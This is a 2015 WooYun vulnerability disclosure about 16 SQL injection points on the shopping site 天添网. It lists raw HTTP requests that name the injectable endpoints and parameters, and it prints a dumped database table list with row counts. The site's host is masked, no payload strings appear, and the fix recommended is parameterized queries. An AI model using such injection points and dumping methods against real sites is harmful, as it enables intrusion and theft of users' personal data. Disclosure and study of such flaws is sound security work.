当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156930

漏洞标题:天添网16处注入打包(170万购物数据泄露/6万多身份证号/邮箱/手机号/密码等用户信息泄露)

相关厂商:天添网

漏洞作者: 路人甲

提交时间:2015-12-01 01:36

修复时间:2016-01-18 11:50

公开时间:2016-01-18 11:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-01: 细节已通知厂商并且等待厂商处理中
2015-12-04: 厂商已经确认,细节仅向厂商公开
2015-12-14: 细节向核心白帽子及相关领域专家公开
2015-12-24: 细节向普通白帽子公开
2016-01-03: 细节向实习白帽子公开
2016-01-18: 细节向公众公开

简要描述:

16处注入打包

详细说明:

1#
http://**.**.**.**/icarttw/help/shoppingCartAllRowzbin.action?yhid=5672680&_=1448764540382

QQ截图20151129203650.png


QQ截图20151129203722.png


QQ截图20151129203848.png


2#

POST /icarttw/userZhmm.action HTTP/1.1
Content-Length: 57
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Cookie: JSESSIONID=34B3FBFD6EE516FDC4AE37B462C4C888-n1
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
dlzh=1


QQ截图20151129204102.png


3#

http://**.**.**.**/shoppingCartAllRowzbin.action?yhid=5672680&_=1448766096973


QQ截图20151129204139.png


4#

POST /icarttw/checksxkzbin.action HTTP/1.1
Content-Length: 14
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/
Cookie: JSESSIONID=34B3FBFD6EE516FDC4AE37B462C4C888-n1
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
nickname=1


QQ截图20151129205018.png

漏洞证明:

5#

GET /icarttw/help/shoppingCartAllRowzbin.action?yhid=1&_=1448764540382 HTTP/1.1
Referer: http://**.**.**.**/
Cookie: JSESSIONID=34B3FBFD6EE516FDC4AE37B462C4C888-n1
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*


QQ截图20151129211756.png


6#

GET /icarttw/newscount.action?userKey=1 HTTP/1.1
Referer: http://**.**.**.**/
Cookie: JSESSIONID=34B3FBFD6EE516FDC4AE37B462C4C888-n1
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*


QQ截图20151129213024.png


7#

POST /icarttw/search/searchdy HTTP/1.1
Content-Length: 15
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/
Cookie: JSESSIONID=34B3FBFD6EE516FDC4AE37B462C4C888-n1
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
flid=0&pm=1


QQ截图20151129213417.png


8#

GET /icarttw/search/searchdy.action?flid=0&page=2&pm=1 HTTP/1.1
Referer: http://**.**.**.**/
Cookie: JSESSIONID=34B3FBFD6EE516FDC4AE37B462C4C888-n1
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*


QQ截图20151129213455.png


9#

POST /icarttw/showpj.action HTTP/1.1
Content-Length: 19
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/
Cookie: JSESSIONID=34B3FBFD6EE516FDC4AE37B462C4C888-n1
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
page=1&spxxid=1


QQ截图20151129213858.png


10#

POST /icarttw/showsd.action HTTP/1.1
Content-Length: 19
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/
Cookie: JSESSIONID=34B3FBFD6EE516FDC4AE37B462C4C888-n1
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
page=1&spxxid=1


QQ截图20151129213951.png


#11

GET /icarttw/search/searchyx.action?page=2&pm=1&yxjz=2 HTTP/1.1
Referer: http://**.**.**.**/
Cookie: JSESSIONID=34B3FBFD6EE516FDC4AE37B462C4C888-n1
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*


QQ截图20151129214104.png


12#

GET /icarttw/search/searchyx?pm=1&yxjz=0 HTTP/1.1
Referer: http://**.**.**.**/
Cookie: JSESSIONID=34B3FBFD6EE516FDC4AE37B462C4C888-n1
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*


QQ截图20151129214134.png


13#

POST /icarttw/userZhmm.action HTTP/1.1
Content-Length: 10
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/
Cookie: JSESSIONID=34B3FBFD6EE516FDC4AE37B462C4C888-n1
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
dlzh=1


QQ截图20151129214459.png


14#

GET /shoppingCartAllRowzbin.action?yhid=1&_=1448766096973 HTTP/1.1
Referer: http://**.**.**.**/
Cookie: JSESSIONID=34B3FBFD6EE516FDC4AE37B462C4C888-n1
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*


QQ截图20151129214931.png


15#

POST /showpj.action HTTP/1.1
Content-Length: 19
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/
Cookie: JSESSIONID=34B3FBFD6EE516FDC4AE37B462C4C888-n1
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
page=1&spxxid=1


QQ截图20151129215007.png


16#

POST /showsd.action HTTP/1.1
Content-Length: 19
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/
Cookie: JSESSIONID=34B3FBFD6EE516FDC4AE37B462C4C888-n1
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
page=1&spxxid=1


QQ截图20151129215317.png


Database: EXCHANGE
+----------------------------+---------+
| Table                      | Entries |
+----------------------------+---------+
| JT_WEBG_GYSSPMX            | 3078001 |
| JT_WEBG_CGSHMX             | 2372075 |
| JT_UPDATEUSERLOG_0904      | 2059741 |
| JT_J_SPXX                  | 1793591 |
| JT_J_SPXXSJBACK            | 1717493 |
| XWQ_JT_J_SPXX_KC           | 1415286 |
| JT_WEBG_GYSSPTZ            | 1401730 |
| JT_J_SPXX_TP               | 1243834 |
| XWQ_JT_J_SPXX              | 1201511 |
| JT_WEBG_JTDMX              | 1151380 |
| JT_J_SPXX20110512          | 912994  |
| JT_J_SPXX_2010_12_29       | 867858  |
| JT_J_SPXX_2010_12_30       | 867858  |
| HW_SPXX                    | 761691  |
| JT_J_SPXX_0201             | 739357  |
| SYSLOG                     | 609240  |
| TJBB_XSDMX                 | 401788  |
| JT_J_SPXX_KC               | 390568  |
| JT_WEBK_XSDMX              | 374935  |
| TJBB_FHDMX                 | 364391  |
| XWQ_SPXX2                  | 337555  |
| JT_WEBG_CGSH               | 331392  |
| TJBB_UPLOAD_TEMP_PRODUCTS  | 320666  |
| JT_C_BMSPKFMX              | 199028  |
| JT_J_SPXX_BM               | 174764  |
| JT_C_BMSPKFTZ              | 168671  |
| JT_UPDATEUSERLOG0908       | 166571  |
| T_LLJL                     | 166160  |
| TJBB_ZTSP                  | 165042  |
| JKXX_TJBB_XSDMX_BACK       | 157737  |
| TJBB_XSZFRZ                | 153738  |
| JT_WEBK_KHSPTZ             | 150463  |
| TJBB_MANAGEDBLOG           | 130298  |
| JT_J_SJHIS                 | 114881  |
| JT_WEBG_JTD                | 114732  |
| JT_J_SPXX_BACK             | 111700  |
| TJBB_XSD                   | 105825  |
| JT_J_SPXX_SPJJ             | 99378   |
| TJBB_FHD                   | 94758   |
| JT_UPDATEUSERLOG_0903      | 83098   |
| TJBB_USERSXK               | 77705   |
| TJBB_DXFSRZ                | 72353   |
| TJBB_YXHD_PRODUCTS         | 68317   |
| TJBB_USER                  | 65396   |
| HASSENDSMS                 | 45537   |
| JT_WEBK_USER               | 35995   |
| JT_WEBG_CGDMX              | 34597   |
| TJBB_DDSHR                 | 31556   |
| TJBB_FJDH                  | 28510   |
| TJBB_XSDQXTZ               | 22693   |
| JT_WEBK_GGDJXX             | 22258   |
| TEMP_RXSP1                 | 21285   |
| T_SHDZ                     | 20560   |
| JT_WEBG_GYSJSDMX           | 19914   |
| T_SHDZTMP                  | 18144   |
| T_SCJ                      | 18019   |
| TJBB_DTKRZ                 | 17548   |
| TJBB_KZSXNR                | 16852   |
| CHECK_LOGIN                | 16677   |
| T_GWC                      | 15047   |
| TJBB_TKRZ                  | 14090   |
| TJBB_DTK                   | 13983   |
| SPXX_TGTEMP                | 13512   |

修复方案:

参数化查询,或waf

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-12-04 11:44

厂商回复:

CNVD确认所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。

最新状态:

暂无